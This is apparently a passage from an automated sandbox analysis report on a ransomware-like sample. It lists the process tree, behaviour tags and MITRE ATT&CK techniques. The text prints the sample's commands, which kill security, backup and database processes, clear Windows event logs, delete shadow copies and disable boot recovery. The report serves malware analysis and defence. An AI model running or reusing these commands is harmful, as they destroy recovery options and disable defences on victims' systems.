SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"
3⤵
PID:1640

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM pg_ctl.exe /F
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2468

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM rcrelay.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2740

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SogouImeBroker.exe /F
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2904

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM CCenter.exe /F
4⤵
PID:2396

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ScanFrm.exe /F
4⤵
PID:2812

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM d_manage.exe /F
4⤵
PID:2104

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM RsTray.exe /F
4⤵
PID:2624

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM wampmanager.exe /F
4⤵
PID:2772

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM RavTray.exe /F
4⤵
PID:2788

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mssearch.exe /F
4⤵
PID:2620

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sqlmangr.exe /F
4⤵
PID:2648

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM msftesql.exe /F
4⤵
PID:2132

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SyncBaseSvr.exe /F
4⤵
PID:2464

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM oracle.exe /F
4⤵
PID:2836

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM TNSLSNR.exe /F
4⤵
PID:208

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SyncBaseConsole.exe /F
4⤵
PID:2132

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM aspnet_state.exe /F
4⤵
PID:2772

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM AutoBackUpEx.exe /F
4⤵
PID:2860

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM redis-server.exe /F
4⤵
PID:2848

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM MySQLNotifier.exe /F
4⤵
PID:2220

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM oravssw.exe /F
4⤵
PID:2992

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM fppdis5.exe /F
4⤵
PID:2920

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM His6Service.exe /F
4⤵
PID:212

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"
3⤵
PID:1192

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BackupExec.exe /F
4⤵
PID:2520

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Att.exe /F
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2728

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mdm.exe /F
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2880

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BackupExecManagementService.exe /F
4⤵
PID:2348

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM bengine.exe /F
4⤵
PID:2644

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM benetns.exe /F
4⤵
PID:2100

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM beserver.exe /F
4⤵
PID:2328

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM pvlsvr.exe /F
4⤵
PID:2096

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM bedbg.exe /F
4⤵
PID:2552

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM beremote.exe /F
4⤵
PID:208

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM beremote.exe /F
4⤵
PID:2364

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM beremote.exe /F
4⤵
PID:2732

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM beremote.exe /F
4⤵
PID:2392

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM RemoteAssistProcess.exe /F
4⤵
PID:2124

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BarMoniService.exe /F
4⤵
- Kills process with taskkill
PID:2800

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM GoodGameSrv.exe /F
4⤵
PID:2740

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BarCMService.exe /F
4⤵
PID:3068

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM TsService.exe /F
4⤵
PID:2916

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM GoodGame.exe /F
4⤵
PID:2644

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BarServerView.exe /F
4⤵
PID:2820

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM IcafeServicesTray.exe /F
4⤵
PID:3044

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BsAgent_0.exe /F
4⤵
PID:2160

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ControlServer.exe /F
4⤵
PID:2156

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM DisklessServer.exe /F
4⤵
PID:2480

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM DumpServer.exe /F
4⤵
PID:2424

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM NetDiskServer.exe /F
4⤵
PID:224

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T"
3⤵
PID:660

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM VBoxSDS.exe /F
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2476

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM mysqld.exe /F
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2760

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM TeamViewer_Service.exe /F
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2168

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM TeamViewer.exe /F
4⤵
PID:2460

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM CasLicenceServer.exe /F
4⤵
PID:2852

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM tv_w32.exe /F
4⤵
PID:2872

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM tv_x64.exe /F
4⤵
PID:2208

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM rdm.exe /F
4⤵
PID:2608

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SecureCRT.exe /F
4⤵
PID:3060

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SecureCRTPortable.exe /F
4⤵
PID:2892

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM VirtualBox.exe /F
4⤵
- Kills process with taskkill
PID:2260

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM VBoxSVC.exe /F
4⤵
PID:3016

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM VirtualBoxVM.exe /F
4⤵
PID:2816

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM abs_deployer.exe /F
4⤵
PID:2472

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM edr_monitor.exe /F
4⤵
PID:2848

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sfupdatemgr.exe /F
4⤵
PID:224

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ipc_proxy.exe /F
4⤵
PID:2520

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM edr_agent.exe /F
4⤵
- Kills process with taskkill
PID:2488

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM edr_sec_plan.exe /F
4⤵
- Kills process with taskkill
PID:2408

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sfavsvc.exe /F
4⤵
PID:204

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F
4⤵
PID:2828

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM DataShareBox.ShareBoxService.exe /F
4⤵
PID:2496

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Jointsky.CloudExchangeService.exe /F
4⤵
PID:1612

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Jointsky.CloudExchange.NodeService.ein /F
4⤵
PID:2152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WEVTUTIL EL
3⤵
PID:2092

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL EL
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2192

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2796

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Application"
3⤵
PID:2752

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "DebugChannel"
3⤵
PID:2380

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "DirectShowFilterGraph"
3⤵
PID:2184

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "DirectShowPluginControl"
3⤵
- Clears Windows event logs
PID:2720

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Els_Hyphenation/Analytic"
3⤵
PID:3008

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "EndpointMapper"
3⤵
PID:2444

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "ForwardedEvents"
3⤵
PID:2864

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "HardwareEvents"
3⤵
PID:2632

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Internet Explorer"
3⤵
- Clears Windows event logs
PID:2208

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Key Management Service"
3⤵
- Clears Windows event logs
PID:2524

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "MF_MediaFoundationDeviceProxy"
3⤵
PID:2872

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Media Center"
3⤵
PID:3028

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "MediaFoundationDeviceProxy"
3⤵
PID:2944

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "MediaFoundationPerformance"
3⤵
PID:2356

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "MediaFoundationPipeline"
3⤵
PID:2816

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "MediaFoundationPlatform"
3⤵
PID:2164

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Microsoft-IE/Diagnostic"
3⤵
PID:2648

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Microsoft-IEDVTOOL/Diagnostic"
3⤵
PID:2252

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Microsoft-IEFRAME/Diagnostic"
3⤵
- Clears Windows event logs
PID:2832

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Microsoft-JSDumpHeap/Diagnostic"
3⤵
PID:2400

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Microsoft-PerfTrack-IEFRAME/Diagnostic"
3⤵
PID:1848

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Microsoft-PerfTrack-MSHTML/Diagnostic"
3⤵
PID:2372

C:\Windows\SysWOW64\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ADSI/Debug"
3⤵
- Clears Windows event logs
PID:2420

C:\Users\Admin\AppData\Local\Temp\a-Yaoofdkgd.exe
C:\Users\Admin\AppData\Local\Temp\a-Yaoofdkgd.exe
2⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1816

C:\Windows\system32\vssadmin.exe
"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
3⤵
PID:384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
3⤵
PID:1768

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher"
4⤵
PID:856

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
3⤵
PID:1544

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4406421196248365901076716016691761086-1228646388-18139330991668044517-32773239"
1⤵
PID:384

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-14428458251608349086-278006269-85228215717494750891396583688-8974074898062165"
1⤵
PID:1972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "memcached Server"
1⤵
PID:3004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeFastSearch
1⤵
PID:2568

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeFrontEndTransport
1⤵
PID:2912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc
1⤵
PID:2328

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DDNSService
2⤵
PID:2764

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$RECYCLE.BIN\FILERE~1.TXT

Filesize
1KB

MD5
2e9aef4ad0e406608cf769cc24e2dc53

SHA1
